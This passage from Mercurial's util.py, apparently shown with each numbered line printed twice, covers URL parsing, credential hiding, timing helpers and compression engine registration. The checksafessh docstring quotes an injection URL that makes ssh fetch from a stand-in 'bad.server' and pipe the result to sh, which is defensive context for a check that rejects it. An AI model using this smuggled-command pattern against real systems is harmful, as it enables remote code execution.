3201 if ':' in self.user:
3202 self.user, self.passwd = self.user.split(':', 1)
3202 self.user, self.passwd = self.user.split(':', 1)
3203 if not self.host:
3203 if not self.host:
3204 self.host = None
3204 self.host = None
3205
3205
3206 # Don't split on colons in IPv6 addresses without ports
3206 # Don't split on colons in IPv6 addresses without ports
3207 if (self.host and ':' in self.host and
3207 if (self.host and ':' in self.host and
3208 not (self.host.startswith('[') and self.host.endswith(']'))):
3208 not (self.host.startswith('[') and self.host.endswith(']'))):
3209 self._hostport = self.host
3209 self._hostport = self.host
3210 self.host, self.port = self.host.rsplit(':', 1)
3210 self.host, self.port = self.host.rsplit(':', 1)
3211 if not self.host:
3211 if not self.host:
3212 self.host = None
3212 self.host = None
3213
3213
3214 if (self.host and self.scheme == 'file' and
3214 if (self.host and self.scheme == 'file' and
3215 self.host not in ('localhost', '127.0.0.1', '[::1]')):
3215 self.host not in ('localhost', '127.0.0.1', '[::1]')):
3216 raise Abort(_('file:// URLs can only refer to localhost'))
3216 raise Abort(_('file:// URLs can only refer to localhost'))
3217
3217
3218 self.path = path
3218 self.path = path
3219
3219
3220 # leave the query string escaped
3220 # leave the query string escaped
3221 for a in ('user', 'passwd', 'host', 'port',
3221 for a in ('user', 'passwd', 'host', 'port',
3222 'path', 'fragment'):
3222 'path', 'fragment'):
3223 v = getattr(self, a)
3223 v = getattr(self, a)
3224 if v is not None:
3224 if v is not None:
3225 setattr(self, a, urlreq.unquote(v))
3225 setattr(self, a, urlreq.unquote(v))
3226
3226
3227 @encoding.strmethod
3227 @encoding.strmethod
3228 def __repr__(self):
3228 def __repr__(self):
3229 attrs = []
3229 attrs = []
3230 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
3230 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
3231 'query', 'fragment'):
3231 'query', 'fragment'):
3232 v = getattr(self, a)
3232 v = getattr(self, a)
3233 if v is not None:
3233 if v is not None:
3234 attrs.append('%s: %r' % (a, v))
3234 attrs.append('%s: %r' % (a, v))
3235 return '<url %s>' % ', '.join(attrs)
3235 return '<url %s>' % ', '.join(attrs)
3236
3236
3237 def __bytes__(self):
3237 def __bytes__(self):
3238 r"""Join the URL's components back into a URL string.
3238 r"""Join the URL's components back into a URL string.
3239
3239
3240 Examples:
3240 Examples:
3241
3241
3242 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
3242 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
3243 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
3243 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
3244 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
3244 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
3245 'http://user:pw@host:80/?foo=bar&baz=42'
3245 'http://user:pw@host:80/?foo=bar&baz=42'
3246 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
3246 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
3247 'http://user:pw@host:80/?foo=bar%3dbaz'
3247 'http://user:pw@host:80/?foo=bar%3dbaz'
3248 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
3248 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
3249 'ssh://user:pw@[::1]:2200//home/joe#'
3249 'ssh://user:pw@[::1]:2200//home/joe#'
3250 >>> bytes(url(b'http://localhost:80//'))
3250 >>> bytes(url(b'http://localhost:80//'))
3251 'http://localhost:80//'
3251 'http://localhost:80//'
3252 >>> bytes(url(b'http://localhost:80/'))
3252 >>> bytes(url(b'http://localhost:80/'))
3253 'http://localhost:80/'
3253 'http://localhost:80/'
3254 >>> bytes(url(b'http://localhost:80'))
3254 >>> bytes(url(b'http://localhost:80'))
3255 'http://localhost:80/'
3255 'http://localhost:80/'
3256 >>> bytes(url(b'bundle:foo'))
3256 >>> bytes(url(b'bundle:foo'))
3257 'bundle:foo'
3257 'bundle:foo'
3258 >>> bytes(url(b'bundle://../foo'))
3258 >>> bytes(url(b'bundle://../foo'))
3259 'bundle:../foo'
3259 'bundle:../foo'
3260 >>> bytes(url(b'path'))
3260 >>> bytes(url(b'path'))
3261 'path'
3261 'path'
3262 >>> bytes(url(b'file:///tmp/foo/bar'))
3262 >>> bytes(url(b'file:///tmp/foo/bar'))
3263 'file:///tmp/foo/bar'
3263 'file:///tmp/foo/bar'
3264 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
3264 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
3265 'file:///c:/tmp/foo/bar'
3265 'file:///c:/tmp/foo/bar'
3266 >>> print(url(br'bundle:foo\bar'))
3266 >>> print(url(br'bundle:foo\bar'))
3267 bundle:foo\bar
3267 bundle:foo\bar
3268 >>> print(url(br'file:///D:\data\hg'))
3268 >>> print(url(br'file:///D:\data\hg'))
3269 file:///D:\data\hg
3269 file:///D:\data\hg
3270 """
3270 """
3271 if self._localpath:
3271 if self._localpath:
3272 s = self.path
3272 s = self.path
3273 if self.scheme == 'bundle':
3273 if self.scheme == 'bundle':
3274 s = 'bundle:' + s
3274 s = 'bundle:' + s
3275 if self.fragment:
3275 if self.fragment:
3276 s += '#' + self.fragment
3276 s += '#' + self.fragment
3277 return s
3277 return s
3278
3278
3279 s = self.scheme + ':'
3279 s = self.scheme + ':'
3280 if self.user or self.passwd or self.host:
3280 if self.user or self.passwd or self.host:
3281 s += '//'
3281 s += '//'
3282 elif self.scheme and (not self.path or self.path.startswith('/')
3282 elif self.scheme and (not self.path or self.path.startswith('/')
3283 or hasdriveletter(self.path)):
3283 or hasdriveletter(self.path)):
3284 s += '//'
3284 s += '//'
3285 if hasdriveletter(self.path):
3285 if hasdriveletter(self.path):
3286 s += '/'
3286 s += '/'
3287 if self.user:
3287 if self.user:
3288 s += urlreq.quote(self.user, safe=self._safechars)
3288 s += urlreq.quote(self.user, safe=self._safechars)
3289 if self.passwd:
3289 if self.passwd:
3290 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
3290 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
3291 if self.user or self.passwd:
3291 if self.user or self.passwd:
3292 s += '@'
3292 s += '@'
3293 if self.host:
3293 if self.host:
3294 if not (self.host.startswith('[') and self.host.endswith(']')):
3294 if not (self.host.startswith('[') and self.host.endswith(']')):
3295 s += urlreq.quote(self.host)
3295 s += urlreq.quote(self.host)
3296 else:
3296 else:
3297 s += self.host
3297 s += self.host
3298 if self.port:
3298 if self.port:
3299 s += ':' + urlreq.quote(self.port)
3299 s += ':' + urlreq.quote(self.port)
3300 if self.host:
3300 if self.host:
3301 s += '/'
3301 s += '/'
3302 if self.path:
3302 if self.path:
3303 # TODO: similar to the query string, we should not unescape the
3303 # TODO: similar to the query string, we should not unescape the
3304 # path when we store it, the path might contain '%2f' = '/',
3304 # path when we store it, the path might contain '%2f' = '/',
3305 # which we should *not* escape.
3305 # which we should *not* escape.
3306 s += urlreq.quote(self.path, safe=self._safepchars)
3306 s += urlreq.quote(self.path, safe=self._safepchars)
3307 if self.query:
3307 if self.query:
3308 # we store the query in escaped form.
3308 # we store the query in escaped form.
3309 s += '?' + self.query
3309 s += '?' + self.query
3310 if self.fragment is not None:
3310 if self.fragment is not None:
3311 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
3311 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
3312 return s
3312 return s
3313
3313
3314 __str__ = encoding.strmethod(__bytes__)
3314 __str__ = encoding.strmethod(__bytes__)
3315
3315
3316 def authinfo(self):
3316 def authinfo(self):
3317 user, passwd = self.user, self.passwd
3317 user, passwd = self.user, self.passwd
3318 try:
3318 try:
3319 self.user, self.passwd = None, None
3319 self.user, self.passwd = None, None
3320 s = bytes(self)
3320 s = bytes(self)
3321 finally:
3321 finally:
3322 self.user, self.passwd = user, passwd
3322 self.user, self.passwd = user, passwd
3323 if not self.user:
3323 if not self.user:
3324 return (s, None)
3324 return (s, None)
3325 # authinfo[1] is passed to urllib2 password manager, and its
3325 # authinfo[1] is passed to urllib2 password manager, and its
3326 # URIs must not contain credentials. The host is passed in the
3326 # URIs must not contain credentials. The host is passed in the
3327 # URIs list because Python < 2.4.3 uses only that to search for
3327 # URIs list because Python < 2.4.3 uses only that to search for
3328 # a password.
3328 # a password.
3329 return (s, (None, (s, self.host),
3329 return (s, (None, (s, self.host),
3330 self.user, self.passwd or ''))
3330 self.user, self.passwd or ''))
3331
3331
3332 def isabs(self):
3332 def isabs(self):
3333 if self.scheme and self.scheme != 'file':
3333 if self.scheme and self.scheme != 'file':
3334 return True # remote URL
3334 return True # remote URL
3335 if hasdriveletter(self.path):
3335 if hasdriveletter(self.path):
3336 return True # absolute for our purposes - can't be joined()
3336 return True # absolute for our purposes - can't be joined()
3337 if self.path.startswith(br'\\'):
3337 if self.path.startswith(br'\\'):
3338 return True # Windows UNC path
3338 return True # Windows UNC path
3339 if self.path.startswith('/'):
3339 if self.path.startswith('/'):
3340 return True # POSIX-style
3340 return True # POSIX-style
3341 return False
3341 return False
3342
3342
3343 def localpath(self):
3343 def localpath(self):
3344 if self.scheme == 'file' or self.scheme == 'bundle':
3344 if self.scheme == 'file' or self.scheme == 'bundle':
3345 path = self.path or '/'
3345 path = self.path or '/'
3346 # For Windows, we need to promote hosts containing drive
3346 # For Windows, we need to promote hosts containing drive
3347 # letters to paths with drive letters.
3347 # letters to paths with drive letters.
3348 if hasdriveletter(self._hostport):
3348 if hasdriveletter(self._hostport):
3349 path = self._hostport + '/' + self.path
3349 path = self._hostport + '/' + self.path
3350 elif (self.host is not None and self.path
3350 elif (self.host is not None and self.path
3351 and not hasdriveletter(path)):
3351 and not hasdriveletter(path)):
3352 path = '/' + path
3352 path = '/' + path
3353 return path
3353 return path
3354 return self._origpath
3354 return self._origpath
3355
3355
3356 def islocal(self):
3356 def islocal(self):
3357 '''whether localpath will return something that posixfile can open'''
3357 '''whether localpath will return something that posixfile can open'''
3358 return (not self.scheme or self.scheme == 'file'
3358 return (not self.scheme or self.scheme == 'file'
3359 or self.scheme == 'bundle')
3359 or self.scheme == 'bundle')
3360
3360
3361 def hasscheme(path):
3361 def hasscheme(path):
3362 return bool(url(path).scheme)
3362 return bool(url(path).scheme)
3363
3363
3364 def hasdriveletter(path):
3364 def hasdriveletter(path):
3365 return path and path[1:2] == ':' and path[0:1].isalpha()
3365 return path and path[1:2] == ':' and path[0:1].isalpha()
3366
3366
3367 def urllocalpath(path):
3367 def urllocalpath(path):
3368 return url(path, parsequery=False, parsefragment=False).localpath()
3368 return url(path, parsequery=False, parsefragment=False).localpath()
3369
3369
3370 def checksafessh(path):
3370 def checksafessh(path):
3371 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3371 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3372
3372
3373 This is a sanity check for ssh urls. ssh will parse the first item as
3373 This is a sanity check for ssh urls. ssh will parse the first item as
3374 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3374 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3375 Let's prevent these potentially exploited urls entirely and warn the
3375 Let's prevent these potentially exploited urls entirely and warn the
3376 user.
3376 user.
3377
3377
3378 Raises an error.Abort when the url is unsafe.
3378 Raises an error.Abort when the url is unsafe.
3379 """
3379 """
3380 path = urlreq.unquote(path)
3380 path = urlreq.unquote(path)
3381 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3381 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3382 raise error.Abort(_('potentially unsafe url: %r') %
3382 raise error.Abort(_('potentially unsafe url: %r') %
3383 (path,))
3383 (path,))
3384
3384
3385 def hidepassword(u):
3385 def hidepassword(u):
3386 '''hide user credential in a url string'''
3386 '''hide user credential in a url string'''
3387 u = url(u)
3387 u = url(u)
3388 if u.passwd:
3388 if u.passwd:
3389 u.passwd = '***'
3389 u.passwd = '***'
3390 return bytes(u)
3390 return bytes(u)
3391
3391
3392 def removeauth(u):
3392 def removeauth(u):
3393 '''remove all authentication information from a url string'''
3393 '''remove all authentication information from a url string'''
3394 u = url(u)
3394 u = url(u)
3395 u.user = u.passwd = None
3395 u.user = u.passwd = None
3396 return str(u)
3396 return str(u)
3397
3397
3398 timecount = unitcountfn(
3398 timecount = unitcountfn(
3399 (1, 1e3, _('%.0f s')),
3399 (1, 1e3, _('%.0f s')),
3400 (100, 1, _('%.1f s')),
3400 (100, 1, _('%.1f s')),
3401 (10, 1, _('%.2f s')),
3401 (10, 1, _('%.2f s')),
3402 (1, 1, _('%.3f s')),
3402 (1, 1, _('%.3f s')),
3403 (100, 0.001, _('%.1f ms')),
3403 (100, 0.001, _('%.1f ms')),
3404 (10, 0.001, _('%.2f ms')),
3404 (10, 0.001, _('%.2f ms')),
3405 (1, 0.001, _('%.3f ms')),
3405 (1, 0.001, _('%.3f ms')),
3406 (100, 0.000001, _('%.1f us')),
3406 (100, 0.000001, _('%.1f us')),
3407 (10, 0.000001, _('%.2f us')),
3407 (10, 0.000001, _('%.2f us')),
3408 (1, 0.000001, _('%.3f us')),
3408 (1, 0.000001, _('%.3f us')),
3409 (100, 0.000000001, _('%.1f ns')),
3409 (100, 0.000000001, _('%.1f ns')),
3410 (10, 0.000000001, _('%.2f ns')),
3410 (10, 0.000000001, _('%.2f ns')),
3411 (1, 0.000000001, _('%.3f ns')),
3411 (1, 0.000000001, _('%.3f ns')),
3412 )
3412 )
3413
3413
3414 _timenesting = [0]
3414 _timenesting = [0]
3415
3415
3416 def timed(func):
3416 def timed(func):
3417 '''Report the execution time of a function call to stderr.
3417 '''Report the execution time of a function call to stderr.
3418
3418
3419 During development, use as a decorator when you need to measure
3419 During development, use as a decorator when you need to measure
3420 the cost of a function, e.g. as follows:
3420 the cost of a function, e.g. as follows:
3421
3421
3422 @util.timed
3422 @util.timed
3423 def foo(a, b, c):
3423 def foo(a, b, c):
3424 pass
3424 pass
3425 '''
3425 '''
3426
3426
3427 def wrapper(*args, **kwargs):
3427 def wrapper(*args, **kwargs):
3428 start = timer()
3428 start = timer()
3429 indent = 2
3429 indent = 2
3430 _timenesting[0] += indent
3430 _timenesting[0] += indent
3431 try:
3431 try:
3432 return func(*args, **kwargs)
3432 return func(*args, **kwargs)
3433 finally:
3433 finally:
3434 elapsed = timer() - start
3434 elapsed = timer() - start
3435 _timenesting[0] -= indent
3435 _timenesting[0] -= indent
3436 stderr.write('%s%s: %s\n' %
3436 stderr.write('%s%s: %s\n' %
3437 (' ' * _timenesting[0], func.__name__,
3437 (' ' * _timenesting[0], func.__name__,
3438 timecount(elapsed)))
3438 timecount(elapsed)))
3439 return wrapper
3439 return wrapper
3440
3440
3441 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3441 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3442 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3442 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3443
3443
3444 def sizetoint(s):
3444 def sizetoint(s):
3445 '''Convert a space specifier to a byte count.
3445 '''Convert a space specifier to a byte count.
3446
3446
3447 >>> sizetoint(b'30')
3447 >>> sizetoint(b'30')
3448 30
3448 30
3449 >>> sizetoint(b'2.2kb')
3449 >>> sizetoint(b'2.2kb')
3450 2252
3450 2252
3451 >>> sizetoint(b'6M')
3451 >>> sizetoint(b'6M')
3452 6291456
3452 6291456
3453 '''
3453 '''
3454 t = s.strip().lower()
3454 t = s.strip().lower()
3455 try:
3455 try:
3456 for k, u in _sizeunits:
3456 for k, u in _sizeunits:
3457 if t.endswith(k):
3457 if t.endswith(k):
3458 return int(float(t[:-len(k)]) * u)
3458 return int(float(t[:-len(k)]) * u)
3459 return int(t)
3459 return int(t)
3460 except ValueError:
3460 except ValueError:
3461 raise error.ParseError(_("couldn't parse size: %s") % s)
3461 raise error.ParseError(_("couldn't parse size: %s") % s)
3462
3462
3463 class hooks(object):
3463 class hooks(object):
3464 '''A collection of hook functions that can be used to extend a
3464 '''A collection of hook functions that can be used to extend a
3465 function's behavior. Hooks are called in lexicographic order,
3465 function's behavior. Hooks are called in lexicographic order,
3466 based on the names of their sources.'''
3466 based on the names of their sources.'''
3467
3467
3468 def __init__(self):
3468 def __init__(self):
3469 self._hooks = []
3469 self._hooks = []
3470
3470
3471 def add(self, source, hook):
3471 def add(self, source, hook):
3472 self._hooks.append((source, hook))
3472 self._hooks.append((source, hook))
3473
3473
3474 def __call__(self, *args):
3474 def __call__(self, *args):
3475 self._hooks.sort(key=lambda x: x[0])
3475 self._hooks.sort(key=lambda x: x[0])
3476 results = []
3476 results = []
3477 for source, hook in self._hooks:
3477 for source, hook in self._hooks:
3478 results.append(hook(*args))
3478 results.append(hook(*args))
3479 return results
3479 return results
3480
3480
3481 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3481 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3482 '''Yields lines for a nicely formatted stacktrace.
3482 '''Yields lines for a nicely formatted stacktrace.
3483 Skips the 'skip' last entries, then return the last 'depth' entries.
3483 Skips the 'skip' last entries, then return the last 'depth' entries.
3484 Each file+linenumber is formatted according to fileline.
3484 Each file+linenumber is formatted according to fileline.
3485 Each line is formatted according to line.
3485 Each line is formatted according to line.
3486 If line is None, it yields:
3486 If line is None, it yields:
3487 length of longest filepath+line number,
3487 length of longest filepath+line number,
3488 filepath+linenumber,
3488 filepath+linenumber,
3489 function
3489 function
3490
3490
3491 Not be used in production code but very convenient while developing.
3491 Not be used in production code but very convenient while developing.
3492 '''
3492 '''
3493 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3493 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3494 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3494 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3495 ][-depth:]
3495 ][-depth:]
3496 if entries:
3496 if entries:
3497 fnmax = max(len(entry[0]) for entry in entries)
3497 fnmax = max(len(entry[0]) for entry in entries)
3498 for fnln, func in entries:
3498 for fnln, func in entries:
3499 if line is None:
3499 if line is None:
3500 yield (fnmax, fnln, func)
3500 yield (fnmax, fnln, func)
3501 else:
3501 else:
3502 yield line % (fnmax, fnln, func)
3502 yield line % (fnmax, fnln, func)
3503
3503
3504 def debugstacktrace(msg='stacktrace', skip=0,
3504 def debugstacktrace(msg='stacktrace', skip=0,
3505 f=stderr, otherf=stdout, depth=0):
3505 f=stderr, otherf=stdout, depth=0):
3506 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3506 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3507 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3507 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3508 By default it will flush stdout first.
3508 By default it will flush stdout first.
3509 It can be used everywhere and intentionally does not require an ui object.
3509 It can be used everywhere and intentionally does not require an ui object.
3510 Not be used in production code but very convenient while developing.
3510 Not be used in production code but very convenient while developing.
3511 '''
3511 '''
3512 if otherf:
3512 if otherf:
3513 otherf.flush()
3513 otherf.flush()
3514 f.write('%s at:\n' % msg.rstrip())
3514 f.write('%s at:\n' % msg.rstrip())
3515 for line in getstackframes(skip + 1, depth=depth):
3515 for line in getstackframes(skip + 1, depth=depth):
3516 f.write(line)
3516 f.write(line)
3517 f.flush()
3517 f.flush()
3518
3518
3519 class dirs(object):
3519 class dirs(object):
3520 '''a multiset of directory names from a dirstate or manifest'''
3520 '''a multiset of directory names from a dirstate or manifest'''
3521
3521
3522 def __init__(self, map, skip=None):
3522 def __init__(self, map, skip=None):
3523 self._dirs = {}
3523 self._dirs = {}
3524 addpath = self.addpath
3524 addpath = self.addpath
3525 if safehasattr(map, 'iteritems') and skip is not None:
3525 if safehasattr(map, 'iteritems') and skip is not None:
3526 for f, s in map.iteritems():
3526 for f, s in map.iteritems():
3527 if s[0] != skip:
3527 if s[0] != skip:
3528 addpath(f)
3528 addpath(f)
3529 else:
3529 else:
3530 for f in map:
3530 for f in map:
3531 addpath(f)
3531 addpath(f)
3532
3532
3533 def addpath(self, path):
3533 def addpath(self, path):
3534 dirs = self._dirs
3534 dirs = self._dirs
3535 for base in finddirs(path):
3535 for base in finddirs(path):
3536 if base in dirs:
3536 if base in dirs:
3537 dirs[base] += 1
3537 dirs[base] += 1
3538 return
3538 return
3539 dirs[base] = 1
3539 dirs[base] = 1
3540
3540
3541 def delpath(self, path):
3541 def delpath(self, path):
3542 dirs = self._dirs
3542 dirs = self._dirs
3543 for base in finddirs(path):
3543 for base in finddirs(path):
3544 if dirs[base] > 1:
3544 if dirs[base] > 1:
3545 dirs[base] -= 1
3545 dirs[base] -= 1
3546 return
3546 return
3547 del dirs[base]
3547 del dirs[base]
3548
3548
3549 def __iter__(self):
3549 def __iter__(self):
3550 return iter(self._dirs)
3550 return iter(self._dirs)
3551
3551
3552 def __contains__(self, d):
3552 def __contains__(self, d):
3553 return d in self._dirs
3553 return d in self._dirs
3554
3554
3555 if safehasattr(parsers, 'dirs'):
3555 if safehasattr(parsers, 'dirs'):
3556 dirs = parsers.dirs
3556 dirs = parsers.dirs
3557
3557
3558 def finddirs(path):
3558 def finddirs(path):
3559 pos = path.rfind('/')
3559 pos = path.rfind('/')
3560 while pos != -1:
3560 while pos != -1:
3561 yield path[:pos]
3561 yield path[:pos]
3562 pos = path.rfind('/', 0, pos)
3562 pos = path.rfind('/', 0, pos)
3563
3563
3564 # compression code
3564 # compression code
3565
3565
3566 SERVERROLE = 'server'
3566 SERVERROLE = 'server'
3567 CLIENTROLE = 'client'
3567 CLIENTROLE = 'client'
3568
3568
3569 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3569 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3570 (u'name', u'serverpriority',
3570 (u'name', u'serverpriority',
3571 u'clientpriority'))
3571 u'clientpriority'))
3572
3572
3573 class compressormanager(object):
3573 class compressormanager(object):
3574 """Holds registrations of various compression engines.
3574 """Holds registrations of various compression engines.
3575
3575
3576 This class essentially abstracts the differences between compression
3576 This class essentially abstracts the differences between compression
3577 engines to allow new compression formats to be added easily, possibly from
3577 engines to allow new compression formats to be added easily, possibly from
3578 extensions.
3578 extensions.
3579
3579
3580 Compressors are registered against the global instance by calling its
3580 Compressors are registered against the global instance by calling its
3581 ``register()`` method.
3581 ``register()`` method.
3582 """
3582 """
3583 def __init__(self):
3583 def __init__(self):
3584 self._engines = {}
3584 self._engines = {}
3585 # Bundle spec human name to engine name.
3585 # Bundle spec human name to engine name.
3586 self._bundlenames = {}
3586 self._bundlenames = {}
3587 # Internal bundle identifier to engine name.
3587 # Internal bundle identifier to engine name.
3588 self._bundletypes = {}
3588 self._bundletypes = {}
3589 # Revlog header to engine name.
3589 # Revlog header to engine name.
3590 self._revlogheaders = {}
3590 self._revlogheaders = {}
3591 # Wire proto identifier to engine name.
3591 # Wire proto identifier to engine name.
3592 self._wiretypes = {}
3592 self._wiretypes = {}
3593
3593
3594 def __getitem__(self, key):
3594 def __getitem__(self, key):
3595 return self._engines[key]
3595 return self._engines[key]
3596
3596
3597 def __contains__(self, key):
3597 def __contains__(self, key):
3598 return key in self._engines
3598 return key in self._engines
3599
3599
3600 def __iter__(self):
3600 def __iter__(self):
3601 return iter(self._engines.keys())
3601 return iter(self._engines.keys())
3602
3602
3603 def register(self, engine):
3603 def register(self, engine):
3604 """Register a compression engine with the manager.
3604 """Register a compression engine with the manager.
3605
3605
3606 The argument must be a ``compressionengine`` instance.
3606 The argument must be a ``compressionengine`` instance.
3607 """
3607 """
3608 if not isinstance(engine, compressionengine):
3608 if not isinstance(engine, compressionengine):
3609 raise ValueError(_('argument must be a compressionengine'))
3609 raise ValueError(_('argument must be a compressionengine'))
3610
3610
3611 name = engine.name()
3611 name = engine.name()
3612
3612
3613 if name in self._engines:
3613 if name in self._engines:
3614 raise error.Abort(_('compression engine %s already registered') %
3614 raise error.Abort(_('compression engine %s already registered') %
3615 name)
3615 name)
3616
3616
3617 bundleinfo = engine.bundletype()
3617 bundleinfo = engine.bundletype()
3618 if bundleinfo:
3618 if bundleinfo:
3619 bundlename, bundletype = bundleinfo
3619 bundlename, bundletype = bundleinfo
3620
3620
3621 if bundlename in self._bundlenames:
3621 if bundlename in self._bundlenames:
3622 raise error.Abort(_('bundle name %s already registered') %
3622 raise error.Abort(_('bundle name %s already registered') %
3623 bundlename)
3623 bundlename)
3624 if bundletype in self._bundletypes:
3624 if bundletype in self._bundletypes:
3625 raise error.Abort(_('bundle type %s already registered by %s') %
3625 raise error.Abort(_('bundle type %s already registered by %s') %
3626 (bundletype, self._bundletypes[bundletype]))
3626 (bundletype, self._bundletypes[bundletype]))
3627
3627
3628 # No external facing name declared.
3628 # No external facing name declared.
3629 if bundlename:
3629 if bundlename:
3630 self._bundlenames[bundlename] = name
3630 self._bundlenames[bundlename] = name
3631
3631
3632 self._bundletypes[bundletype] = name
3632 self._bundletypes[bundletype] = name
3633
3633
3634 wiresupport = engine.wireprotosupport()
3634 wiresupport = engine.wireprotosupport()
3635 if wiresupport:
3635 if wiresupport:
3636 wiretype = wiresupport.name
3636 wiretype = wiresupport.name
3637 if wiretype in self._wiretypes:
3637 if wiretype in self._wiretypes:
3638 raise error.Abort(_('wire protocol compression %s already '
3638 raise error.Abort(_('wire protocol compression %s already '
3639 'registered by %s') %
3639 'registered by %s') %
3640 (wiretype, self._wiretypes[wiretype]))
3640 (wiretype, self._wiretypes[wiretype]))
3641
3641
3642 self._wiretypes[wiretype] = name
3642 self._wiretypes[wiretype] = name
3643
3643
3644 revlogheader = engine.revlogheader()
3644 revlogheader = engine.revlogheader()
3645 if revlogheader and revlogheader in self._revlogheaders:
3645 if revlogheader and revlogheader in self._revlogheaders:
3646 raise error.Abort(_('revlog header %s already registered by %s') %
3646 raise error.Abort(_('revlog header %s already registered by %s') %
3647 (revlogheader, self._revlogheaders[revlogheader]))
3647 (revlogheader, self._revlogheaders[revlogheader]))
3648
3648
3649 if revlogheader:
3649 if revlogheader:
3650 self._revlogheaders[revlogheader] = name
3650 self._revlogheaders[revlogheader] = name
3651
3651
3652 self._engines[name] = engine
3652 self._engines[name] = engine
3653
3653
3654 @property
3654 @property
3655 def supportedbundlenames(self):
3655 def supportedbundlenames(self):
3656 return set(self._bundlenames.keys())
3656 return set(self._bundlenames.keys())
3657
3657
3658 @property
3658 @property
3659 def supportedbundletypes(self):
3659 def supportedbundletypes(self):
3660 return set(self._bundletypes.keys())
3660 return set(self._bundletypes.keys())
3661
3661
3662 def forbundlename(self, bundlename):
3662 def forbundlename(self, bundlename):
3663 """Obtain a compression engine registered to a bundle name.
3663 """Obtain a compression engine registered to a bundle name.
3664
3664
3665 Will raise KeyError if the bundle type isn't registered.
3665 Will raise KeyError if the bundle type isn't registered.
3666
3666
3667 Will abort if the engine is known but not available.
3667 Will abort if the engine is known but not available.
3668 """
3668 """
3669 engine = self._engines[self._bundlenames[bundlename]]
3669 engine = self._engines[self._bundlenames[bundlename]]
3670 if not engine.available():
3670 if not engine.available():
3671 raise error.Abort(_('compression engine %s could not be loaded') %
3671 raise error.Abort(_('compression engine %s could not be loaded') %
3672 engine.name())
3672 engine.name())
3673 return engine
3673 return engine
3674
3674
3675 def forbundletype(self, bundletype):
3675 def forbundletype(self, bundletype):
3676 """Obtain a compression engine registered to a bundle type.
3676 """Obtain a compression engine registered to a bundle type.
3677
3677
3678 Will raise KeyError if the bundle type isn't registered.
3678 Will raise KeyError if the bundle type isn't registered.
3679
3679
3680 Will abort if the engine is known but not available.
3680 Will abort if the engine is known but not available.
3681 """
3681 """
3682 engine = self._engines[self._bundletypes[bundletype]]
3682 engine = self._engines[self._bundletypes[bundletype]]
3683 if not engine.available():
3683 if not engine.available():
3684 raise error.Abort(_('compression engine %s could not be loaded') %
3684 raise error.Abort(_('compression engine %s could not be loaded') %
3685 engine.name())
3685 engine.name())
3686 return engine
3686 return engine
3687
3687
3688 def supportedwireengines(self, role, onlyavailable=True):
3688 def supportedwireengines(self, role, onlyavailable=True):
3689 """Obtain compression engines that support the wire protocol.
3689 """Obtain compression engines that support the wire protocol.
3690
3690
3691 Returns a list of engines in prioritized order, most desired first.
3691 Returns a list of engines in prioritized order, most desired first.
3692
3692
3693 If ``onlyavailable`` is set, filter out engines that can't be
3693 If ``onlyavailable`` is set, filter out engines that can't be
3694 loaded.
3694 loaded.
3695 """
3695 """
3696 assert role in (SERVERROLE, CLIENTROLE)
3696 assert role in (SERVERROLE, CLIENTROLE)
3697
3697
3698 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3698 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3699
3699
3700 engines = [self._engines[e] for e in self._wiretypes.values()]
3700 engines = [self._engines[e] for e in self._wiretypes.values()]
3701 if onlyavailable:
3701 if onlyavailable:
3702 engines = [e for e in engines if e.available()]
3702 engines = [e for e in engines if e.available()]
3703
3703
3704 def getkey(e):
3704 def getkey(e):
3705 # Sort first by priority, highest first. In case of tie, sort
3705 # Sort first by priority, highest first. In case of tie, sort
3706 # alphabetically. This is arbitrary, but ensures output is
3706 # alphabetically. This is arbitrary, but ensures output is
3707 # stable.
3707 # stable.
3708 w = e.wireprotosupport()
3708 w = e.wireprotosupport()
3709 return -1 * getattr(w, attr), w.name
3709 return -1 * getattr(w, attr), w.name
3710
3710
3711 return list(sorted(engines, key=getkey))
3711 return list(sorted(engines, key=getkey))
3712
3712
3713 def forwiretype(self, wiretype):
